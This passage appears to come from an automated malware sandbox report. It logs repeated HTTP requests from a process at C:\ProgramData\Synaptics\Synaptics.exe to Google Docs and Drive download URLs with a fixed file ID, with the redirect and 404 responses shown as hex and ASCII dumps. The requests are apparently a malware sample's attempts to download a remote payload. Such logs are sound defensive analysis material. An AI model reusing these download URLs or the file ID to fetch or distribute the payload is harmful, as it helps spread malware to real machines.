                                                                                              2025-01-02 19:29:09 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 56 59 65 5a 49 49 65 66 41 4a 2d 5f 52 66 68 58 50 48 75 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="RVYeZIIefAJ-_RfhXPHu3A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:09 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              76192.168.2.749991216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:09 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              77192.168.2.749992142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:09 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              78192.168.2.749995216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:10 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:10 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:10 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-idcdAk5E78s3WCWv75eKlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              79192.168.2.750002216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:10 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:11 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:11 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-HsEDW3jr3h_niS771zns9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              80192.168.2.750006142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:11 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:11 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6qePi-oNze6j1Xb_QyJsI6KpyE0Fak2MtcHZluM_W9eh5BYANf72cPDvNbaeufpV1CwZtHQ10
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:11 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-E3_V1hM7IuPwFCGai82noA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:11 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:11 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 41 6f 75 63 47 69 50 41 32 63 47 35 70 62 45 73 76 67 4a 65 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="4AoucGiPA2cG5pbEsvgJeA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:11 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              81192.168.2.750005216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:11 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:11 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:11 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-VNjY5yEygUMleBqbQwP3SQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              82192.168.2.750014142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:11 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:12 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7DS_pHNYbhiBmxstMpCPpvzFoM6kpqEQGkBG5O_lHLh99iab6ZzyBxpR2Quj7UNVZryCjR_ek
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:12 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YU-niXs69C82prCCCLdRLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:12 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:29:12 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 32 51 4a 50 66 71 50 34 59 4f 34 6f 4c 64 4b 43 32 6a 4d 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="z2QJPfqP4YO4oLdKC2jMAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:29:12 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              83192.168.2.750015216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:11 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:12 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:12 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-sqFFfTXN1KqnY1JhtBHChg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              84192.168.2.750018216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:12 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:12 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:12 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-XtQ83DILEemL5Gqq16HQmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              85192.168.2.750019142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:12 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:12 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4vwLKGqCv7KQyhZJuzo6XrrumCEFoJ3lv6IHe-K1YjJwEgSdvwM5JoYHt6lmKS1Ja6lXpSXIY
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
